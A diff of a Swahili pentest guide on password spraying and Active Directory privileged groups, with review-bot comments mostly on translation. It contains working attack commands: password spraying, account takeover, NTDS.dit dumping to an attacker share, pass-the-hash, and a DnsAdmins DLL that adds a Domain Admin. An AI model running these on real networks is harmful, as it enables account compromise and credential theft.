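Review bot: `Lists of common usernames could also be useful:` replaces a Swahili sentence (`Orodha za **common usernames** pia zinaweza kuwa muhimu`) with plain English, and `Kumbuka kwamba unaweza **could lockout some accounts if you try several wrong passwords**` now carries the verb twice (`unaweza` and `could`). Keep the removed wording for the first line and drop one of the two verbs in the second. The password-policy line also lost the bold on `user credentials`, `shell` and `domain user` that the rest of this page uses for those terms.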
@ -31,7 +31,7 @@ net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### Exploitation kutoka Linux (au zote)
### Exploitation kutoka Linux (au wote)
- Kutumia **crackmapexec:**
```bash
@ -40,6 +40,21 @@ crackmapexec smb <IP> -u users.txt -p passwords.txt
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
- Kutumia **NetExec (CME successor)** kwa spraying iliyolengwa, yenye kelele ndogo kupitia SMB/WinRM:
```bash
# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts
# Spray a single candidate password against harvested users over SMB
netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
--continue-on-success --no-bruteforce --shares
# Validate a hit over WinRM (or use SMB exec methods)
netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"
# Tip: sync your clock before Kerberos-based auth to avoid skew issues
sudo ntpdate <DC_FQDN>
```
- Kutumia [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
```bash
# Password Spraying
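Review bot: the added hosts-file one-liner `cat hosts /etc/hosts | sudo sponge /etc/hosts` depends on `sponge` from moreutils, which is not installed by default; note the dependency next to the command (plain `sudo tee /etc/hosts` is not a drop-in replacement because it truncates the file before `cat` reads it, which is exactly why `sponge` is used). The lead-in `kwa spraying iliyolengwa, yenye kelele ndogo kupitia SMB/WinRM` promises low noise, but the SMB spray below is one password-based logon attempt per user, the same as the crackmapexec example above it; this page itself says later that Kerberos pre-auth spraying `inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts`, so the low-noise claim belongs there, not to the SMB/WinRM block.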
@ -47,16 +62,16 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kuonyesha idadi ya majaribio ili kuepuka kufungiwa):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza taja idadi ya majaribio ili kuepuka kufungwa kwa akaunti):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MINGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - Haipendekezwi; wakati mwingine haifanyi kazi
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa kutumia module ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
![](<../../images/image (745).png>)
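Review bot: `unaweza taja idadi ya majaribio` drops the infinitive marker; it should read `unaweza kutaja idadi ya majaribio` (the removed line had the correct form `unaweza kuonyesha idadi ya majaribio`).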
@ -69,7 +84,7 @@ done
```
#### Kutoka Windows
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye module ya brute:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@ -77,7 +92,7 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuzalisha watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana nayo):
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana na sera hiyo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
@ -85,12 +100,12 @@ Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Nywila lazima ibadilishwe wakati wa kuingia ufuatao" (SAMR)
### Tambua na Kuchukua Akaunti za "Password must change at next logon" (SAMR)
Mbinu yenye kelele ndogo ni kufanya spray password isiyo hatari/tupu na kugundua akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password ilitimizwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Mbinu yenye kelele kidogo ni spray a benign/empty password na kushika akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha password ilisitishwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Workflow:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
- Orodhesha watumiaji (RID brute via SAMR) kujenga orodha ya malengo:
{{#ref}}
../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
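Review bot: `Mbinu yenye kelele kidogo ni spray a benign/empty password na kushika akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE` leaves the middle of the sentence in English, and `password ilisitishwa kwa nguvu` (the password was forcibly suspended) misreads the idea: STATUS_PASSWORD_MUST_CHANGE means the password has been expired by an administrator, so something like `password ililazimishwa kuisha muda` fits. The heading `Tambua na Kuchukua Akaunti` mixes an imperative with an infinitive; use `Tambua na Chukua` or `Kutambua na Kuchukua`.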
@ -99,12 +114,12 @@ Workflow:
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunasa akaunti ambazo zinatakiwa kubadilisha password zao wakati wa next logon:
- Spray an empty password na endelea kwenye hits ili capture accounts ambazo lazima kubadilisha password at next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa kutumia NetExecs module (hakuna old password inahitajika wakati "must change" imewekwa):
- Kwa kila hit, badilisha nenosiri kupitia SAMR kwa kutumia NetExecs module (nenosiri la zamani halihitajiki wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
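Review bot: `Spray an empty password na endelea kwenye hits ili capture accounts ambazo lazima kubadilisha password at next logon` is now more English than Swahili and reads worse than the line it replaces (`Spray password tupu na endelea kwenye hits ili kunasa akaunti ambazo zinatakiwa kubadilisha password zao wakati wa next logon`); keep the removed wording. `NetExecs module` again needs the possessive apostrophe (`NetExec's`).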
@ -114,8 +129,8 @@ netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya uendeshaji:
- Hakikisha saa ya mwenyeji wako iko sawa na ile ya DC kabla ya Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) inamaanisha creds ni halali lakini akaunti haina interactive logon rights.
- Hakikisha saa ya mwenyeji wako imepangwa sawa na DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- A [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) ina maana creds ni halali lakini akaunti haina interactive logon rights.
## Brute Force
```bash
@ -123,17 +138,17 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
```
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaleta ulinganifu mzuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals zilizodukuliwa katika Neo4j kwa BloodHound pathing.
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na policy awareness (domain policy + PSOs + badPwdCount buffer) ili kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals waliodhulumiwa kwenye Neo4j kwa BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Domain lockout policy + PSO-aware filtering kuacha configurable attempt buffer (threshold) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Matumizi ya msingi na ugunduzi:
Basic usage and discovery:
```bash
# List available pattern variables
spearspray -l
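Review bot: "principals waliodhulumiwa" translates "owned" as "wronged/oppressed", which is not what BloodHound means; "owned" here is the attacker term for a compromised principal, so either keep the English "owned" as the tool's own term or use a word meaning controlled/compromised. This hunk also swaps a Swahili line for an English one: the removed "Matumizi ya msingi na ugunduzi:" becomes "Basic usage and discovery:", and the "Key ideas:" bullets stay untranslated, which is the wrong direction for a translation commit.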
@ -144,7 +159,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Kulenga na udhibiti wa muundo:
Kulenga na udhibiti wa mifumo:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
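Review bot: "udhibiti wa mifumo" reads as "control of systems"; the heading is about SpearSpray's password patterns, and the same concept is rendered "pattern" a few hunks later ("mfumo wa pattern"). Pick one rendering (keeping "pattern" as the tool's term is simplest) and use it for both headings.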
@ -161,11 +176,11 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Uboreshaji wa Neo4j/BloodHound:
Neo4j/BloodHound uboreshaji:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Muhtasari wa mfumo wa patterns (patterns.txt):
Muhtasari wa mfumo wa pattern (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
@ -176,27 +191,27 @@ Muhtasari wa mfumo wa patterns (patterns.txt):
```
Available variables include:
- {name}, {samaccountname}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Vifaa vya muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
Vidokezo vya uendeshaji:
- Pendelea kuwasilisha maswali kwa PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa za sera zinazoaminika zaidi.
- Urejeshaji wa badPwdCount unaanzishwa kwenye jaribio linalofuata baada ya dirisha la uchunguzi; tumia kizingiti na upangaji wa wakati ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kuendana na trafiki ya kawaida.
Operational notes:
- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.
> Kidokezo: Saizi ya ukurasa wa LDAP inayotumika kwa SpearSpray ni 200; rekebisha kwa -lps inapohitajika.
> Kidokezo: SpearSprays default LDAP page size is 200; adjust with -lps as needed.
## Outlook Web Access
Kuna zana nyingi za p**assword spraying outlook**.
Kuna zana mbalimbali kwa ajili ya p**assword spraying outlook**.
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayoaminika!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password / a small list of passwords to spray.
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
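Review bot: This hunk replaces translated text with English: "Muda kutoka kwa pwdLastSet..." and "Vifaa vya muundo..." become "Temporal from each user's pwdLastSet..." and "Composition helpers and org token...", and the whole "Vidokezo vya uendeshaji:" block becomes the English "Operational notes:" list; the tip line is left half-translated ("Kidokezo: SpearSpray's default LDAP page size is 200..."). Restore the Swahili versions (or translate the new wording) so the section does not regress. Separately, the Ruler example keeps `--delay 0`, which contradicts the lockout guidance given in the SpearSpray notes a few lines above (threshold, jitter, rate limiting); a non-zero delay in the sample command would be consistent with the page's own advice.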
@ -227,6 +242,7 @@ Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
- [HTB Sendai 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,8 +1,8 @@
# Privileged Groups
# Makundi Yenye Vibali
{{#include ../../banners/hacktricks-training.md}}
## Well Known groups with administration privileges
## Makundi Yanayojulikana Yenye Vibali vya Usimamizi
- **Administrators**
- **Domain Admins**
@ -10,82 +10,82 @@
## Account Operators
Kikundi hiki kina uwezo wa kuunda akaunti na vikundi ambavyo si wasimamizi kwenye kikoa. Aidha, kinaruhusu kuingia kwa ndani kwenye Domain Controller (DC).
Kikundi hiki kimepewa uwezo wa kuunda akaunti na makundi ambayo si administrators kwenye domain. Zaidi ya hayo, kinaruhusu kuingia kwa ndani (local login) kwenye Domain Controller (DC).
Ili kubaini wanachama wa kikundi hiki, amri ifuatayo inatekelezwa:
```bash
Get-NetGroupMember -Identity "Account Operators" -Recurse
```
Kuongeza watumiaji wapya kunaruhusiwa, pamoja na kuingia kwa ndani kwenye DC01.
Inaruhusiwa kuongeza watumiaji wapya, pamoja na kuingia kwa ndani kwenye DC.
## Kundi la AdminSDHolder
## Kikundi cha AdminSDHolder
Orodha ya Udhibiti wa Ufikiaji (ACL) ya kundi la **AdminSDHolder** ni muhimu kwani inaweka ruhusa kwa "vikundi vilivyolindwa" ndani ya Active Directory, ikiwa ni pamoja na vikundi vyenye mamlaka ya juu. Mekanismu hii inahakikisha usalama wa vikundi hivi kwa kuzuia mabadiliko yasiyoruhusiwa.
Orodha ya Udhibiti wa Ufikiaji (ACL) ya kikundi cha **AdminSDHolder** ni muhimu kwani inaweka ruhusa kwa makundi yote yaliyolindwa ndani ya Active Directory, ikiwa ni pamoja na makundi yenye vibali vya juu. Mekanismu hii inahakikisha usalama wa makundi haya kwa kuzuia mabadiliko yasiyoruhusiwa.
Mshambuliaji anaweza kutumia hili kwa kubadilisha ACL ya kundi la **AdminSDHolder**, akitoa ruhusa kamili kwa mtumiaji wa kawaida. Hii itampa mtumiaji huyo udhibiti kamili juu ya vikundi vyote vilivyolindwa. Ikiwa ruhusa za mtumiaji huyu zitabadilishwa au kuondolewa, zitarudishwa kiotomatiki ndani ya saa moja kutokana na muundo wa mfumo.
Mshambuliaji anaweza kuitumia hili kwa kubadilisha ACL ya kikundi cha **AdminSDHolder**, na kumpa mtumiaji wa kawaida ruhusa kamili. Hii ingempa mtumiaji huyo udhibiti kamili juu ya makundi yote yaliyolindwa. Iwapo ruhusa za mtumiaji huyo zitabadilishwa au kuondolewa, zitarejeshwa kiotomatiki ndani ya saa moja kutokana na muundo wa mfumo.
Amri za kupitia wanachama na kubadilisha ruhusa ni:
Amri za kukagua wanachama na kubadilisha ruhusa ni pamoja na:
```bash
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
```
Inapatikana skripti ili kuharakisha mchakato wa urejeleaji: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
Skripti inapatikana ili kuharakisha mchakato wa urejesho: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
Kwa maelezo zaidi, tembelea [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence).
## AD Recycle Bin
Uanachama katika kundi hili unaruhusu kusoma vitu vilivyofutwa vya Active Directory, ambavyo vinaweza kufichua taarifa nyeti:
Uanachama katika kikundi hiki unaruhusu kusoma vitu vilivyofutwa vya Active Directory, ambavyo vinaweza kufichua taarifa nyeti:
```bash
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
### Domain Controller Access
### Ufikiaji wa Domain Controller
Upatikanaji wa faili kwenye DC umewekwa mipaka isipokuwa mtumiaji ni sehemu ya kundi la `Server Operators`, ambalo hubadilisha kiwango cha upatikanaji.
Ufikiaji wa faili kwenye DC umewekewa vikwazo isipokuwa mtumiaji ni sehemu ya kikundi cha `Server Operators`, ambalo hubadilisha kiwango cha ufikiaji.
### Privilege Escalation
### Kupandisha Vibali
Kwa kutumia `PsService` au `sc` kutoka Sysinternals, mtu anaweza kuchunguza na kubadilisha ruhusa za huduma. Kundi la `Server Operators`, kwa mfano, lina udhibiti kamili juu ya huduma fulani, kuruhusu utekelezaji wa amri za kiholela na kupandisha hadhi:
Kwa kutumia `PsService` au `sc` kutoka Sysinternals, mtu anaweza kukagua na kubadilisha ruhusa za huduma. Kwa mfano, kikundi cha `Server Operators` kina udhibiti kamili juu ya huduma fulani, kuruhusu utekelezaji wa amri zozote na kupandisha vibali:
```cmd
C:\> .\PsService.exe security AppReadiness
```
Amri hii inaonyesha kwamba `Server Operators` wana ufikiaji kamili, wakiruhusu kubadilisha huduma kwa ajili ya haki za juu.
Amri hii inaonyesha kwamba `Server Operators` wana ufikiaji kamili, kuruhusu kusimamia huduma za mfumo ili kupata vibali vilivyoongezwa.
## Backup Operators
Uanachama katika kundi la `Backup Operators` unatoa ufikiaji wa mfumo wa faili wa `DC01` kutokana na haki za `SeBackup` na `SeRestore`. Haki hizi zinaruhusu kupita kwenye folda, kuorodhesha, na uwezo wa kunakili faili, hata bila ruhusa maalum, kwa kutumia bendera ya `FILE_FLAG_BACKUP_SEMANTICS`. Kutumia scripts maalum ni muhimu kwa mchakato huu.
Uanachama kwenye kikundi cha `Backup Operators` hutoa ufikiaji kwa mfumo wa faili wa `DC01` kutokana na vibali vya `SeBackup` na `SeRestore`. Vibali hivi vinaruhusu kutembea ndani ya folda, kuorodhesha, na kunakili faili, hata bila ruhusa za wazi, kwa kutumia bendera ya `FILE_FLAG_BACKUP_SEMANTICS`. Ni muhimu kutumia scripts maalum kwa mchakato huu.
Ili kuorodhesha wanachama wa kundi, tekeleza:
Ili kuorodhesha wanachama wa kikundi, tekeleza:
```bash
Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
### Local Attack
### Shambulio la Lokali
Ili kutumia haki hizi kwa ndani, hatua zifuatazo zinatumika:
Ili kutumia vibali hivi kwa lokali, hatua zifuatazo zinafanywa:
1. Ingiza maktaba muhimu:
1. Ingiza maktaba zinazohitajika:
```bash
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```
2. Wezesha na thibitisha `SeBackupPrivilege`:
2. Washa na uhakikishe `SeBackupPrivilege`:
```bash
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
3. Pata na nakili faili kutoka kwa saraka zilizo na vizuizi, kwa mfano:
3. Kufikia na kunakili faili kutoka kwa saraka zilizozuiliwa, kwa mfano:
```bash
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
```
### AD Attack
### Shambulio la AD
Upatikanaji wa moja kwa moja wa mfumo wa faili wa Domain Controller unaruhusu wizi wa hifadhidata ya `NTDS.dit`, ambayo ina hash zote za NTLM za watumiaji na kompyuta za eneo.
Upatikanaji wa moja kwa moja kwenye mfumo wa faili wa Domain Controller unaruhusu uibiwa wa hifadhidata ya `NTDS.dit`, ambayo ina NTLM hashes zote za watumiaji na kompyuta za domain.
#### Using diskshadow.exe
#### Kutumia diskshadow.exe
1. Create a shadow copy of the `C` drive:
1. Unda shadow copy ya drive `C`:
```cmd
diskshadow.exe
set verbose on
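Review bot: Both old and new text call AdminSDHolder a group ("Kikundi cha AdminSDHolder"), but `CN=AdminSDHolder,CN=System,...` is a container object whose ACL is stamped onto protected accounts and groups by SDProp; it has no members, so `Get-NetGroupMember -Identity "AdminSDHolder" -Recurse` returns nothing useful. The enumeration step should read its ACL instead (for example `Get-ObjectAcl` / `Get-DomainObjectAcl` against that DN), and the heading should say object, not group. Also note the inconsistency introduced here: Account Operators now says "kuingia kwa ndani kwenye DC" while the Backup Operators paragraph still names `DC01` specifically.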
@ -98,11 +98,11 @@ expose %cdrive% F:
end backup
exit
```
2. Nakili `NTDS.dit` kutoka kwa nakala ya kivuli:
2. Nakili `NTDS.dit` kutoka kwenye shadow copy:
```cmd
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```
Mbali na hayo, tumia `robocopy` kwa ajili ya nakala za faili:
Badala yake, tumia `robocopy` kwa kunakili faili:
```cmd
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
```
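Review bot: Drive-letter mismatch in this hunk: the shadow copy is exposed with `expose %cdrive% F:`, the robocopy step reads `F:\Windows\NTDS`, but the copy step reads `Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit`. Change `E:` to `F:` so the three steps agree. Also, `Copy-FileSeBackupPrivilege` is a PowerShell cmdlet from the SeBackupPrivilege module imported earlier, so the fence should be `powershell` rather than `cmd`.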
@ -111,14 +111,22 @@ robocopy /B F:\Windows\NTDS .\ntds ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```
4. Pata hash zote kutoka `NTDS.dit`:
4. Pata hash zote kutoka kwa `NTDS.dit`:
```shell-session
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
5. Baada ya uchimbaji: Pass-the-Hash kwa DA
```bash
# Use the recovered Administrator NT hash to authenticate without the cleartext password
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
# Or execute via SMB using an exec method
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
```
#### Kutumia wbadmin.exe
1. Sanidi mfumo wa faili wa NTFS kwa seva ya SMB kwenye mashine ya mshambuliaji na uhifadhi akiba ya akreditivu za SMB kwenye mashine lengwa.
2. Tumia `wbadmin.exe` kwa ajili ya akiba ya mfumo na uchimbaji wa `NTDS.dit`:
1. Sanidi mfumo wa faili NTFS kwa SMB server kwenye mashine ya mshambuliaji na uhifadhi (cache) nywila za SMB kwenye mashine lengwa.
2. Tumia `wbadmin.exe` kwa ajili ya chelezo ya mfumo na uchimbaji wa `NTDS.dit`:
```cmd
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
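Review bot: In the new step 5, `netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd` asks smbexec to run `cmd`, which spawns an interactive cmd.exe that never returns output through the service-based exec method; use a concrete command (`-x whoami`, matching the WinRM line above it) so the example actually demonstrates execution. While touching this block: the preceding `secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL` does not need `-hashes` in `LOCAL` mode (that flag is for authenticating to a remote target), so the placeholder only confuses readers.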
@ -126,23 +134,29 @@ wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```
Kwa maonyesho ya vitendo, angalia [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
For a practical demonstration, see [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
## DnsAdmins
Wajumbe wa kundi la **DnsAdmins** wanaweza kutumia mamlaka yao kupakia DLL isiyo na mipaka kwa haki za SYSTEM kwenye seva ya DNS, mara nyingi inayoendeshwa kwenye Wasimamizi wa Kikoa. Uwezo huu unaruhusu uwezekano mkubwa wa unyakuzi.
Wanachama wa kundi la **DnsAdmins** wanaweza kutumia vibali vyao kupakia DLL yoyote yenye vibali vya SYSTEM kwenye DNS server, mara nyingi iliyoendesha kwenye Domain Controllers. Uwezo huu unaruhusu matumizi mabaya yenye athari kubwa.
Ili orodhesha wajumbe wa kundi la DnsAdmins, tumia:
Ili kuorodhesha wanachama wa kundi la DnsAdmins, tumia:
```bash
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
```
### Teua DLL isiyokuwa na mipaka
### Endesha DLL yoyote (CVE202140469)
Wajumbe wanaweza kufanya seva ya DNS kupakia DLL isiyokuwa na mipaka (iwe kwa ndani au kutoka kwa sehemu ya mbali) kwa kutumia amri kama:
> [!NOTE]
> Hitilafu hii inaruhusu utekelezaji wa msimbo wowote kwa vibali vya SYSTEM katika huduma ya DNS (kawaida ndani ya DCs). Tatizo hili lilirekebishwa mwaka 2021.
Wanachama wanaweza kufanya server ya DNS kupakia DLL yoyote (kwa ndani au kutoka kwa share ya mbali) kwa kutumia amri kama:
```bash
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
# If dnscmd is not installed run from aprivileged PowerShell session:
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
```
```c
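Review bot: The ```bash block that starts with the two `dnscmd ... /serverlevelplugindll` lines now contains a prose sentence ("An attacker could modify the DLL to add a user to the Domain Admins group ...") followed by `Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools`, so the prose is rendered as shell and the PowerShell cmdlet sits in a bash fence; move the sentence out of the fence as the lead-in to the ```c block and give the cmdlet its own `powershell` fence (also fix "aprivileged" to "a privileged"). The new heading adds CVE-2021-40469 and the note says the issue was patched in 2021, but no advisory is linked; add the reference so the date and identifier can be checked.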
@ -158,23 +172,24 @@ system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /doma
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
```
Kuanza upya huduma ya DNS (ambayo inaweza kuhitaji ruhusa za ziada) ni muhimu ili DLL iweze kupakiwa:
